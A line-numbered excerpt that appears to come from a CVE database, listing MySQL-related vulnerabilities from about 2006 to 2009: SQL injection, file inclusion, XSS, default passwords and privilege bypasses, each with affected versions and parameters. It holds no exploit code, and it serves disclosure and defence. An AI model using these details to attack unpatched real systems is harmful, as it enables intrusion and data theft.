20481| [CVE-2009-4019] mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
20482| [CVE-2009-3696] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.
20483| [CVE-2009-3102] The doHotCopy subroutine in socket-server.pl in Zmanda Recovery Manager (ZRM) for MySQL 2.x before 2.1.1 allows remote attackers to execute arbitrary commands via vectors involving a crafted $MYSQL_BINPATH variable.
20484| [CVE-2009-2942] The mysql-ocaml bindings 1.0.4 for MySQL do not properly support the mysql_real_escape_string function, which might allow remote attackers to leverage escaping issues involving multibyte character encodings.
20485| [CVE-2009-2446] Multiple format string vulnerabilities in the dispatch_command function in libmysqld/sql_parse.cc in mysqld in MySQL 4.0.0 through 5.0.83 allow remote authenticated users to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in a database name in a (1) COM_CREATE_DB or (2) COM_DROP_DB request. NOTE: some of these details are obtained from third party information.
20486| [CVE-2009-1246] Multiple directory traversal vulnerabilities in Blogplus 1.0 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) row_mysql_blocks_center_down[file] parameter to includes/block_center_down.php
20487| [CVE-2009-1208] SQL injection vulnerability in auth2db 0.2.5, and possibly other versions before 0.2.7, uses the addslashes function instead of the mysql_real_escape_string function, which allows remote attackers to conduct SQL injection attacks using multibyte character encodings.
20488| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
20489| [CVE-2009-0819] sql/item_xmlfunc.cc in MySQL 5.1 before 5.1.32 and 6.0 before 6.0.10 allows remote authenticated users to cause a denial of service (crash) via "an XPath expression employing a scalar expression as a FilterExpr with ExtractValue() or UpdateXML()," which triggers an assertion failure.
20490| [CVE-2009-0617] Cisco Application Networking Manager (ANM) before 2.0 uses a default MySQL root password, which makes it easier for remote attackers to execute arbitrary operating-system commands or change system files.
20491| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
20492| [CVE-2008-7247] sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
20493| [CVE-2008-6992] GreenSQL Firewall (greensql-fw), possibly before 0.9.2 or 0.9.4, allows remote attackers to bypass the SQL injection protection mechanism via a WHERE clause containing an expression such as "x=y=z", which is successfully parsed by MySQL.
20494| [CVE-2008-6813] SQL injection vulnerability in index.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the id_kat parameter.
20495| [CVE-2008-6812] SQL injection vulnerability in bukutamu.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the det parameter.
20496| [CVE-2008-6655] Multiple cross-site scripting (XSS) vulnerabilities in GEDCOM_TO_MYSQL 2 allow remote attackers to inject arbitrary web script or HTML via the (1) nom_branche and (2) nom parameters to php/prenom.php
20497| [CVE-2008-6287] Multiple PHP remote file inclusion vulnerabilities in Broadcast Machine 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) MySQLController.php, (2) SQLController.php, (3) SetupController.php, (4) VideoController.php, and (5) ViewController.php in controllers/.
20498| [CVE-2008-6193] Sam Crew MyBlog stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
20499| [CVE-2008-5847] Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.
20500| [CVE-2008-5738] Nodstrum MySQL Calendar 1.1 and 1.2 allows remote attackers to bypass authentication and gain administrative access by setting the nodstrumCalendarV2 cookie to 1. NOTE: some of these details are obtained from third party information.
20501| [CVE-2008-5737] SQL injection vulnerability in index.php in Nodstrum MySQL Calendar 1.1 and 1.2 allows remote attackers to execute arbitrary SQL commands via the username parameter.
20502| [CVE-2008-5069] SQL injection vulnerability in go.php in Panuwat PromoteWeb MySQL, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter.
20503| [CVE-2008-4456] Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, and other versions including versions later than 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document. NOTE: as of 20081031, the issue has not been fixed in MySQL 5.0.67.
20504| [CVE-2008-4455] Directory traversal vulnerability in index.php in EKINdesigns MySQL Quick Admin 1.5.5 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the language cookie.
20505| [CVE-2008-4454] Directory traversal vulnerability in EKINdesigns MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the lang parameter to actions.php. NOTE: the provenance of this information is unknown
20506| [CVE-2008-4180] Unspecified vulnerability in db.php in NooMS 1.1 allows remote attackers to conduct brute force attacks against passwords via a username in the g_dbuser parameter and a password in the g_dbpwd parameter, and possibly a "localhost" g_dbhost parameter value, related to a "Mysql Remote Brute Force Vulnerability."
20507| [CVE-2008-4106] WordPress before 2.6.2 does not properly handle MySQL warnings about insertion of username strings that exceed the maximum column width of the user_login column, and does not properly handle space characters when comparing usernames, which allows remote attackers to change an arbitrary user's password to a random value by registering a similar username and then requesting a password reset, related to a "SQL column truncation vulnerability." NOTE: the attacker can discover the random password by also exploiting CVE-2008-4107.
20508| [CVE-2008-4098] MySQL before 5.0.67 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL home data directory. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4097.
20509| [CVE-2008-4097] MySQL 5.0.51a allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are associated with symlinks within pathnames for subdirectories of the MySQL home data directory, which are followed when tables are created in the future. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-2079.
20510| [CVE-2008-3963] MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6 does not properly handle a b'' (b single-quote single-quote) token, aka an empty bit-string literal, which allows remote attackers to cause a denial of service (daemon crash) by using this token in a SQL statement.
20511| [CVE-2008-3846] Cross-site scripting (XSS) vulnerability in mysql-lists 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
20512| [CVE-2008-3840] Crafty Syntax Live Help (CSLH) 2.14.6 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
20513| [CVE-2008-3820] Cisco Security Manager 3.1 and 3.2 before 3.2.2, when Cisco IPS Event Viewer (IEV) is used, exposes TCP ports used by the MySQL daemon and IEV server, which allows remote attackers to obtain "root access" to IEV via unspecified use of TCP sessions to these ports.
20514| [CVE-2008-3582] SQL injection vulnerability in login.php in Keld PHP-MySQL News Script 0.7.1 allows remote attackers to execute arbitrary SQL commands via the username parameter.
20515| [CVE-2008-3090] Multiple SQL injection vulnerabilities in index.php in BlognPlus (BURO GUN +) 2.5.5 MySQL and PostgreSQL editions allow remote attackers to execute arbitrary SQL commands via the (1) p, (2) e, (3) d, and (4) m parameters, a different vulnerability than CVE-2008-2819.
20516| [CVE-2008-2881] Relative Real Estate Systems 3.0 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
20517| [CVE-2008-2857] AlstraSoft AskMe Pro 2.1 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
20518| [CVE-2008-2819] SQL injection vulnerability in BlognPlus (BURO GUN +) 2.5.4 and earlier MySQL and PostgreSQL editions allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
20519| [CVE-2008-2667] SQL injection vulnerability in the Courier Authentication Library (aka courier-authlib) before 0.60.6 on SUSE openSUSE 10.3 and 11.0, and other platforms, when MySQL and a non-Latin character set are used, allows remote attackers to execute arbitrary SQL commands via the username and unspecified other vectors.
20520| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
20521| [CVE-2008-2079] MySQL 4.1.x before 4.1.24, 5.0.x before 5.0.60, 5.1.x before 5.1.24, and 6.0.x before 6.0.5 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are within the MySQL home data directory, which can point to tables that are created in the future.
20522| [CVE-2008-2029] Multiple SQL injection vulnerabilities in (1) setup_mysql.php and (2) setup_options.php in miniBB 2.2 and possibly earlier, when register_globals is enabled, allow remote attackers to execute arbitrary SQL commands via the xtr parameter in a userinfo action to index.php.
20523| [CVE-2008-1711] Terong PHP Photo Gallery (aka Advanced Web Photo Gallery) 1.0 stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
20524| [CVE-2008-1567] phpMyAdmin before 2.11.5.1 stores the MySQL (1) username and (2) password, and the (3) Blowfish secret key, in cleartext in a Session file under /tmp, which allows local users to obtain sensitive information.
20525| [CVE-2008-1486] SQL injection vulnerability in Phorum before 5.2.6, when mysql_use_ft is disabled, allows remote attackers to execute arbitrary SQL commands via the non-fulltext search.
20526| [CVE-2008-0249] PHP Webquest 2.6 allows remote attackers to retrieve database credentials via a direct request to admin/backup_phpwebquest.php, which leaks the credentials in an error message if a call to /usr/bin/mysqldump fails. NOTE: this might only be an issue in limited environments.
20527| [CVE-2008-0227] yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products, allows remote attackers to cause a denial of service (crash) via a Hello packet containing a large size value, which triggers a buffer over-read in the HASHwithTransform::Update function in hash.cpp.
20528| [CVE-2008-0226] Multiple buffer overflows in yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products, allow remote attackers to execute arbitrary code via (1) the ProcessOldClientHello function in handshake.cpp or (2) "input_buffer& operator>>" in yassl_imp.cpp.
20529| [CVE-2007-6512] PHP MySQL Banner Exchange 2.2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database information via a direct request to inc/lib.inc.
20530| [CVE-2007-6418] The libdspam7-drv-mysql cron job in Debian GNU/Linux includes the MySQL dspam database password in a command line argument, which might allow local users to read the password by listing the process and its arguments.
20531| [CVE-2007-6345] SQL injection vulnerability in aurora framework before 20071208 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, possibly the value parameter to the pack_var function in module/db.lib/db_mysql.lib. NOTE: some of these details are obtained from third party information.
20532| [CVE-2007-6313] MySQL Server 5.1.x before 5.1.23 and 6.0.x before 6.0.4 does not check the rights of the entity executing BINLOG, which allows remote authorized users to execute arbitrary BINLOG statements.
20533| [CVE-2007-6304] The federated engine in MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4, when performing a certain SHOW TABLE STATUS query, allows remote MySQL servers to cause a denial of service (federated handler crash and daemon crash) via a response that lacks the minimum required number of columns.
20534| [CVE-2007-6303] MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4 does not update the DEFINER value of a view when the view is altered, which allows remote authenticated users to gain privileges via a sequence of statements including a CREATE SQL SECURITY DEFINER VIEW statement and an ALTER VIEW statement.
20535| [CVE-2007-6081] AdventNet EventLog Analyzer build 4030 for Windows, and possibly other versions and platforms, installs a mysql instance with a default "root" account without a password, which allows remote attackers to gain privileges and modify logs.
20536| [CVE-2007-5970] MySQL 5.1.x before 5.1.23 and 6.0.x before 6.0.4 allows remote authenticated users to gain privileges on arbitrary tables via unspecified vectors involving use of table-level DATA DIRECTORY and INDEX DIRECTORY options when creating a partitioned table with the same name as a table on which the user lacks privileges.
20537| [CVE-2007-5969] MySQL Community Server 5.0.x before 5.0.51, Enterprise Server 5.0.x before 5.0.52, Server 5.1.x before 5.1.23, and Server 6.0.x before 6.0.4, when a table relies on symlinks created through explicit DATA DIRECTORY and INDEX DIRECTORY options, allows remote authenticated users to overwrite system table information and gain privileges via a RENAME TABLE statement that changes the symlink to point to an existing file.
20538| [CVE-2007-5925] The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
20539| [CVE-2007-5646] SQL injection vulnerability in Sources/Search.php in Simple Machines Forum (SMF) 1.1.3, when MySQL 5 is used, allows remote attackers to execute arbitrary SQL commands via the userspec parameter in a search2 action to index.php.
20540| [CVE-2007-5626] make_catalog_backup in Bacula 2.2.5, and probably earlier, sends a MySQL password as a command line argument, and sometimes transmits cleartext e-mail containing this command line, which allows context-dependent attackers to obtain the password by listing the process and its arguments, or by sniffing the network.
20541| [CVE-2007-5488] Multiple SQL injection vulnerabilities in cdr_addon_mysql in Asterisk-Addons before 1.2.8, and 1.4.x before 1.4.4, allow remote attackers to execute arbitrary SQL commands via the (1) source and (2) destination numbers, and probably (3) SIP URI, when inserting a record.
20542| [CVE-2007-4889] The MySQL extension in PHP 5.2.4 and earlier allows remote attackers to bypass safe_mode and open_basedir restrictions via the MySQL (1) LOAD_FILE, (2) INTO DUMPFILE, and (3) INTO OUTFILE functions, a different issue than CVE-2007-3997.
20543| [CVE-2007-3997] The (1) MySQL and (2) MySQLi extensions in PHP 4 before 4.4.8, and PHP 5 before 5.2.4, allow remote attackers to bypass safe_mode and open_basedir restrictions via MySQL LOCAL INFILE operations, as demonstrated by a query with LOAD DATA LOCAL INFILE.
20544| [CVE-2007-3782] MySQL Community Server before 5.0.45 allows remote authenticated users to gain update privileges for a table in another database via a view that refers to this external table.
20545| [CVE-2007-3781] MySQL Community Server before 5.0.45 does not require privileges such as SELECT for the source table in a CREATE TABLE LIKE statement, which allows remote authenticated users to obtain sensitive information such as the table structure.
20546| [CVE-2007-3780] MySQL Community Server before 5.0.45 allows remote attackers to cause a denial of service (daemon crash) via a malformed password packet in the connection protocol.
20547| [CVE-2007-3567] MySQLDumper 1.21b through 1.23 REV227 uses a "Limit GET" statement in the .htaccess authentication mechanism, which allows remote attackers to bypass authentication requirements via HTTP POST requests.
20548| [CVE-2007-2857] PHP remote file inclusion vulnerability in sample/xls2mysql in ABC Excel Parser Pro 4.0 allows remote attackers to execute arbitrary PHP code via a URL in the parser_path parameter.
20549| [CVE-2007-2766] lib/backup-methods.sh in Backup Manager before 0.7.6 provides the MySQL password as a plaintext command line argument, which allows local users to obtain this password by listing the process and its arguments, related to lib/backup-methods.sh.
20550| [CVE-2007-2693] MySQL before 5.1.18 allows remote authenticated users without SELECT privileges to obtain sensitive information from partitioned tables via an ALTER TABLE statement.
20551| [CVE-2007-2692] The mysql_change_db function in MySQL 5.0.x before 5.0.40 and 5.1.x before 5.1.18 does not restore THD::db_access privileges when returning from SQL SECURITY INVOKER stored routines, which allows remote authenticated users to gain privileges.
20552| [CVE-2007-2691] MySQL before 4.1.23, 5.0.x before 5.0.42, and 5.1.x before 5.1.18 does not require the DROP privilege for RENAME TABLE statements, which allows remote authenticated users to rename arbitrary tables.
20553| [CVE-2007-2583] The in_decimal::set function in item_cmpfunc.cc in MySQL before 5.0.40, and 5.1 before 5.1.18-beta, allows context-dependent attackers to cause a denial of service (crash) via a crafted IF clause that results in a divide-by-zero error and a NULL pointer dereference.
20554| [CVE-2007-2554] Associated Press (AP) Newspower 4.0.1 and earlier uses a default blank password for the MySQL root account, which allows remote attackers to insert or modify news articles via shows.tblscript.
20555| [CVE-2007-2429] ManageEngine PasswordManager Pro (PMP) allows remote attackers to obtain administrative access to a database by injecting a certain command line for the mysql program, as demonstrated by the "-port 2345" and "-u root" arguments. NOTE: the provenance of this information is unknown
20556| [CVE-2007-2364] Multiple PHP remote file inclusion vulnerabilities in burnCMS 0.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the root parameter to (1) mysql.class.php or (2) postgres.class.php in lib/db/
20557| [CVE-2007-2204] Multiple PHP remote file inclusion vulnerabilities in GPL PHP Board (GPB) unstable-2001.11.14-1 allow remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) db.mysql.inc.php or (2) gpb.inc.php in include/, or the (3) theme parameter to themes/ubb/login.php.
20558| [CVE-2007-2016] Cross-site scripting (XSS) vulnerability in mysql/phpinfo.php in phpMyAdmin 2.6.1 allows remote attackers to inject arbitrary web script or HTML via the lang[] parameter.
20559| [CVE-2007-1779] Multiple SQL injection vulnerabilities in the MySQL back-end in Advanced Website Creator (AWC) before 1.9.0 might allow remote attackers to execute arbitrary SQL commands via unspecified parameters, related to use of mysql_escape_string instead of mysql_real_escape_string.
20560| [CVE-2007-1778] PHP remote file inclusion vulnerability in db/mysql.php in the Eve-Nuke 0.1 (EN-Forums) module for PHP-Nuke allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
20561| [CVE-2007-1548] SQL injection vulnerability in functions/functions_filters.asp in Web Wiz Forums before 8.05a (MySQL version) does not properly filter certain characters in SQL commands, which allows remote attackers to execute arbitrary SQL commands via \"' (backslash double-quote quote) sequences, which are collapsed into \'', as demonstrated via the name parameter to forum/pop_up_member_search.asp.
20562| [CVE-2007-1455] Multiple absolute path traversal vulnerabilities in Fantastico, as used with cPanel 10.x, allow remote authenticated users to include and execute arbitrary local files via (1) the userlanguage parameter to includes/load_language.php or (2) the fantasticopath parameter to includes/mysqlconfig.php and certain other files.
20563| [CVE-2007-1439] PHP remote file inclusion vulnerability in ressourcen/dbopen.php in bitesser MySQL Commander 2.7 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the home parameter.
20564| [CVE-2007-1420] MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function.
20565| [CVE-2007-1167] inc/filebrowser/browser.php in deV!L`z Clanportal (DZCP) 1.4.5 and earlier allows remote attackers to obtain MySQL data via the inc/mysql.php value of the file parameter.
20566| [CVE-2007-1111] Multiple cross-site scripting (XSS) vulnerabilities in ActiveCalendar 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the css parameter to (1) flatevents.php, (2) js.php, (3) mysqlevents.php, (4) m_2.php, (5) m_3.php, (6) m_4.php, (7) xmlevents.php, (8) y_2.php, or (9) y_3.php in data/.
20567| [CVE-2007-0926] The dologin function in guestbook.php in KvGuestbook 1.0 Beta allows remote attackers to gain administrative privileges, probably via modified $mysql['pass'] and $gbpass variables.
20568| [CVE-2007-0890] Cross-site scripting (XSS) vulnerability in scripts/passwdmysql in cPanel WebHost Manager (WHM) 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter.
20569| [CVE-2007-0828] PHP remote file inclusion vulnerability in affichearticles.php3 in MySQLNewsEngine allows remote attackers to execute arbitrary PHP code via a URL in the newsenginedir parameter.
20570| [CVE-2007-0167] Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine), as distributed with other aliases, allow remote attackers to execute arbitrary PHP code via a URL in the INC parameter in (1) config_admin.php, (2) config_main.php, (3) config_member.php, and (4) mysql_config.php in config/
20571| [CVE-2007-0124] Unspecified vulnerability in Drupal before 4.6.11, and 4.7 before 4.7.5, when MySQL is used, allows remote authenticated users to cause a denial of service by poisoning the page cache via unspecified vectors, which triggers erroneous 404 HTTP errors for pages that exist.
20572| [CVE-2006-7232] sql_select.cc in MySQL 5.0.x before 5.0.32 and 5.1.x before 5.1.14 allows remote authenticated users to cause a denial of service (crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table, as originally demonstrated using ORDER BY.
20573| [CVE-2006-7194] PHP remote file inclusion vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php in Agora 1.4 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _SESSION[PATH_COMPOSANT] parameter.
20574| [CVE-2006-6948] MyODBC Japanese conversion edition 3.51.06, 2.50.29, and 2.50.25 allows remote attackers to cause a denial of service via a certain string in a response, which has unspecified impact on the MySQL database.
20575| [CVE-2006-6457] tiki-wiki_rss.php in Tikiwiki 1.9.5, 1.9.2, and possibly other versions allows remote attackers to obtain sensitive information (MySQL username and password) via an invalid (large or negative) ver parameter, which leaks the information in an error message.
20576| [CVE-2006-6378] BTSaveMySql 1.2 stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain configuration and save files via direct requests.
20577| [CVE-2006-6254] administration/telecharger.php in Cahier de texte 2.0 allows remote attackers to obtain unparsed content (source code) of files via the chemin parameter, as demonstrated using directory traversal sequences to obtain the MySQL username and password from conn_cahier_de_texte.php. NOTE: it is not clear whether the scope of this issue extends above the web document root, and whether directory traversal is the primary vulnerability.
20578| [CVE-2006-5893] Multiple PHP remote file inclusion vulnerabilities in iWonder Designs Storystream 0.4.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) mysql.php and (2) mysqli.php in include/classes/pear/DB/.
20579| [CVE-2006-5702] Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php, and (21) tiki-webmail_contacts.php, which reveal the information in certain database error messages.
20580| [CVE-2006-5675] Multiple unspecified vulnerabilities in Pentaho Business Intelligence (BI) Suite before 1.2 RC3 (1.2.0.470-RC3) have unknown impact and attack vectors, related to "MySQL Scripts need changes for security," possibly SQL injection vulnerabilities associated with these scripts.
20581| [CVE-2006-5381] Contenido CMS stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain database credentials and other information via a direct request to (1) db_msql.inc, (2) db_mssql.inc, (3) db_mysqli.inc, (4) db_oci8.inc, (5) db_odbc.inc, (6) db_oracle.inc, (7) db_pgsql.inc, or (8) db_sybase.inc in the conlib/ directory.
20582| [CVE-2006-5264] Cross-site scripting (XSS) vulnerability in sql.php in MysqlDumper 1.21 b6 allows remote attackers to inject arbitrary web script or HTML via the db parameter.
20583| [CVE-2006-5127] Multiple cross-site scripting (XSS) vulnerabilities in Bartels Schoene ConPresso before 4.0.5a allow remote attackers to inject arbitrary web script or HTML via (1) the nr parameter in detail.php, (2) the msg parameter in db_mysql.inc.php, and (3) the pos parameter in index.php.
20584| [CVE-2006-5079] PHP remote file inclusion vulnerability in class.mysql.php in Matt Humphrey paBugs 2.0 Beta 3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path_to_bt_dir parameter.
20585| [CVE-2006-5065] PHP remote file inclusion vulnerability in libs/dbmax/mysql.php in ZoomStats 1.0.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[lib][db][path] parameter.
20586| [CVE-2006-5029] SQL injection vulnerability in thread.php in WoltLab Burning Board (wBB) 2.3.x allows remote attackers to obtain the version numbers of PHP, MySQL, and wBB via the page parameter. NOTE: this issue might be a forced SQL error. Also, the original report was disputed by a third party for 2.3.3 and 2.3.4.
20587| [CVE-2006-5027] Jeroen Vennegoor JevonCMS, possibly pre alpha, allows remote attackers to obtain sensitive information via a direct request for php/main/phplib files (1) db_msql.inc, (2) db_mssql.inc, (3) db_mysql.inc, (4) db_oci8.inc, (5) db_odbc.inc, (6) db_oracle.inc, and (7) db_pgsql.inc
20588| [CVE-2006-5014] Unspecified vulnerability in cPanel before 10.9.0 12 Tree allows remote authenticated users to gain privileges via unspecified vectors in (1) mysqladmin and (2) hooksadmin.
20589| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
20590| [CVE-2006-4835] Bluview Blue Magic Board (BMB) (aka BMForum) 5.5 allows remote attackers to obtain sensitive information via a direct request to (1) footer.php, (2) header.php, (3) db_mysql_error.php, (4) langlist.php, (5) sendmail.php, or (6) style.php, which reveals the path in various error messages.
20591| [CVE-2006-4578] export.php in The Address Book 1.04e writes username and password hash information into a publicly accessible file when dumping the MySQL database contents, which allows remote attackers to obtain sensitive information.
20592| [CVE-2006-4380] MySQL before 4.1.13 allows local users to cause a denial of service (persistent replication slave crash) via a query with multiupdate and subselects.
20593| [CVE-2006-4277] Multiple PHP remote file inclusion vulnerabilities in Tutti Nova 1.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the TNLIB_DIR parameter to (1) include/novalib/class.novaAdmin.mysql.php and (2) novalib/class.novaRead.mysql.php. NOTE: the provenance of this information is unknown
20594| [CVE-2006-4276] PHP remote file inclusion vulnerability in Tutti Nova 1.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the TNLIB_DIR parameter to novalib/class.novaEdit.mysql.php.
20595| [CVE-2006-4227] MySQL before 5.0.25 and 5.1 before 5.1.12 evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE.
20596| [CVE-2006-4226] MySQL before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions.
20597| [CVE-2006-4031] MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy.
20598| [CVE-2006-3965] Banex PHP MySQL Banner Exchange 2.21 stores lib.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as database usernames and passwords.
20599| [CVE-2006-3964] PHP remote file inclusion vulnerability in members.php in Banex PHP MySQL Banner Exchange 2.21 allows remote attackers to execute arbitrary PHP code via a URL in the cfg_root parameter.
20600| [CVE-2006-3963] Multiple SQL injection vulnerabilities in Banex PHP MySQL Banner Exchange 2.21 allow remote attackers to execute arbitrary SQL commands via the (1) site_name parameter to (a) signup.php, and the (2) id, (3) deleteuserbanner, (4) viewmem, (5) viewmemunb, (6) viewunmem,or (7) deleteuser parameters to (b) admin.php.
20601| [CVE-2006-3878] Opsware Network Automation System (NAS) 6.0 installs /etc/init.d/mysql with insecure permissions, which allows local users to read the root password for the MySQL MAX database or gain privileges by modifying /etc/init.d/mysql.
20602| [CVE-2006-3486] ** DISPUTED ** Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability.
20603| [CVE-2006-3469] Format string vulnerability in time.cc in MySQL Server 4.1 before 4.1.21 and 5.0 before 1 April 2006 allows remote authenticated users to cause a denial of service (crash) via a format string instead of a date as the first parameter to the date_format function, which is later used in a formatted print call to display the error message.
20604| [CVE-2006-3330] Cross-site scripting (XSS) vulnerability in AddAsset1.php in PHP/MySQL Classifieds (PHP Classifieds) allows remote attackers to execute arbitrary SQL commands via the (1) ProductName ("Title" field), (2) url, and (3) Description parameters, possibly related to issues in add1.php.
20605| [CVE-2006-3329] SQL injection vulnerability in search.php in PHP/MySQL Classifieds (PHP Classifieds) allows remote attackers to execute arbitrary SQL commands via the rate parameter.
20606| [CVE-2006-3081] mysqld in MySQL 4.1.x before 4.1.18, 5.0.x before 5.0.19, and 5.1.x before 5.1.6 allows remote authorized users to cause a denial of service (crash) via a NULL second argument to the str_to_date function.
20607| [CVE-2006-2753] SQL injection vulnerability in MySQL 4.1.x before 4.1.20 and 5.0.x before 5.0.22 allows context-dependent attackers to execute arbitrary SQL commands via crafted multibyte encodings in character sets such as SJIS, BIG5, and GBK, which are not properly handled when the mysql_real_escape function is used to escape the input.
